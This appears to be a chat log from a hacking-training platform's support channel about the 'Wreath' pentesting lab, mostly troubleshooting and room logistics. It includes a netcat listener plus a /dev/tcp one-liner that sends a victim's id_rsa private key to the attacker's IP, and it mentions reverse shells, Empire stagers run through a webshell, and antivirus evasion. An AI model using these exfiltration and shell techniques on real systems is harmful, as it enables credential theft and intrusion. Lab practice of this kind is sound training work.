You can download that from the access page as well, under the networks tab

Hello,
I am trying to download the key in Task 7
however the victims PC does not have nc or python installed to download from the victim onto the attackers machine?
Any advice?

Wait, how on earth did you manage to exploit it without that connected?
Do you have two of them running?

But I connected with the one with my name-wreath.ovpn

That'll be a yes. Can you show me the results of ip a?

It does have python installed, although not netcat. There are a bunch of ways you could do it (including things like a Python webserver or literally copying and pasting).
The one I would go to on Linux is this:

Set up a listener on your attacking machine:
nc -lvnp 443 > id_rsa
Then on the victim:
cat id_rsa > /dev/tcp/YOUR_VPN_IP/443

Raw TCP sockets ftw

Np

So, send the shell back to 10.50.107.8

You've got both of your VPN packs running at once, which works fine, but you need the 10.50 one for networks 🙂

Thank you SO much. I’ll try that and update you in a bit

Go for it! 😄

Thank you for that, I have downloaded the id_rsa onto my system,
However the file is 0 bytes, both on the victims PC and mine?

it went through!!!!!! sh:cannot set terminal process group (1930) inappropriate ioctl for device sh:no job control in this shell

But I’ve got a prompt with sh-4.4#

Sorry to be such a n00b

done in two days @merry robin well done really enjoyed that one!!!!! ;'..;'👍

@high totemyou have a question?

Uh, that's less good

What do you mean?

Well done!

Could you do me a favour:
Disconnect from your VPN and send me the connection pack?

Sounds like someone might be being a prat with the key

Thought that was the case
I will disconnect and send the connection pack now

Would you like it sent DM?

Yes please

Hey! Can anyone tell for how long this machine is gonna be free?

Forever 🙂

turbotax: free for free forever

Umm! Coooll! But why is it asking to have a 7 days streak for joining this room?

Cost, quite simply. It means people have to actually put some thought into it before clicking join. Every person in the room takes up a space on an instance which costs a tonne of cash to run. Having a streak requirement means that people will hopefully be discouraged from just joining and not actually using it.

Hey @merry robin can I dm about wreath network

What's up with it? 🙂

Someone added few files to /var/www/html dir

Can I remove those

And changed index .html too

*sigh*
Yeah, drop me a DM with some screenshots would you?

Sure

woooooooo its officially released

Hey, when I tried to Task20 / reverse shell with powershell I cannot find a way to get it
I set up a socat relay with the correct ports etc but nope
After some time I decided to ||upload an nc binary|| to the compromised linux host and try to listen here and the powershell failed once again.
Then I decided to skip this step and do the next one to get a stable shell on the 1st windows box.

But when I tried to execute the powershell reverse shell again from inside the windows host it errored out.
(This is the payload from task20)

I'm just curious why it isn't working.
Thanks for any kind of information 🙂

It's erroring out in WinRM because powershell is weird about executing powershell as a sub process. I suspect it would do better if some stuff was escaped

Is the firewall open on .200?

I thought it was but I ran it again and it works
i was a bit reee
thanks for the quick help 😄

Np 😄
I live here just now

it is not free

What makes you think that? @dense lotus

when I want join room "You need a 7 day streak to join this room. Subscribed users can access the room instantly!"

Exactly:)

You need a 7 day streak, or premium users can join without a streak.
You obtain a streak by answering at least one question per day.

You can view your current streak from the top right of your page.

its still free, just you need a streak

if you sub, then you dont have to

but its not obligatory

A streak being you need to be active and answer questions on the platform for at least 7 days (in the case of Wreath)

freaking loving it Muiri!

thats the line i fixed in 3.8.1 so hopefully the new version fixes it.

Phew. Thanks! 😄

I may have found some slight grammar bugs, if you want me to post? not important at all

Please do 🙂

(e.g. has some random code that does the grand some of nothing inserted into the exploit)

Which exploit?

If it's the EDB one, I didn't write it

oh, no that was the excerpt from the room

Oh, oops

Ta -- where is that?

lol its just I think "sum" not "some" in this instance

Which task / paragraph?

just checking, i added it to my notes but didn't write where I copied it from hah

Task 38

Equally, with logic-flow analysis, the AV software is still only working with a set of rules to check malicious behaviour. If the malware acts in a way that is unexpected (e.g. has some random code that does the grand some of nothing inserted into the exploit) then it will likely pass this detection method.

Fixed 🙂

also same Task - Fortunately (or unfortunately for us as hackers), this is usually nowhere near enough to bypass static evasion methods. - I think this was supposed to be static detection methods

ok cool I'll delete my comments 😄

Shows how much my testers read of that

Nah, all good

I'm fine with making mistakes

Fixed that too

I think I read everything and if this is all I remember that's quite a good score

Lemme know if you see any others 🙂

Yeah, I'm usually pretty good with that kind of thing. Just occasionally late at night my brain goes dead 😆

yeah no doubt

Hey, I read it. I just self corrected it in my head.

sup3rhero1 is about to start streaming Wreath, for anyone wanting to watch 🙂
https://twitch.tv/sup3rhero1

cool!

Hi everyone, I'm at Task 29 C&C Git Server, and I'm trying to get an agent from Git Server through http_hop listener. I set up the http_hop listener, got the .php files and set up a php server in the webserver. (I also gave firewall access to its port if I didn't mess it up.) But when I try executing Empire stager's payload through the webshell in the gitserver (after url-encoding) I get powershell help page as a response. Basic commands such as "powershell whoami" are working fine. What could be the reason for this?

How thorough does the attack narrative in the writeup have to be if I want to submit it? For example do I need to include the pivot syntax?

I would if I were you, although I may not hold you to that.
As a general rule, everything should be exactly reproducible by a security engineer for the organisation you hacked

That's usually when it's interpreting the command badly. What exactly are you doing?

I got to the id_rsa file, it's empty; not nice 🙂

I created a very simple bash pseudoshell script for the webshell on the Git Server in previous tasks, I used it in the previous tasks and it worked fine. In this task, the task guide says create a http hop listener and use it to get an agent from the Git Server. Then it says to create a multi/launcher stager with this http_hop listener as its listener. I did this, and it gave me a payload "powershell (some options here) -enc (base64 encoded script here)". I took this payload to an online url encoder, and url encoded it. Then I fed it to the webshell on the Git Server through the script I mentioned. Script justs takes the user input and does "a=$userinput" as a post request to the IP address, just like in the tasks.

Goddamnit. Not again.
Which subnet are you on?

Could you please disconnect from the VPN and DM me the config? I'll fix it manually 🙂

ok thanks, but which config?

The .ovpn file you downloaded

is the network work for you guys?

which network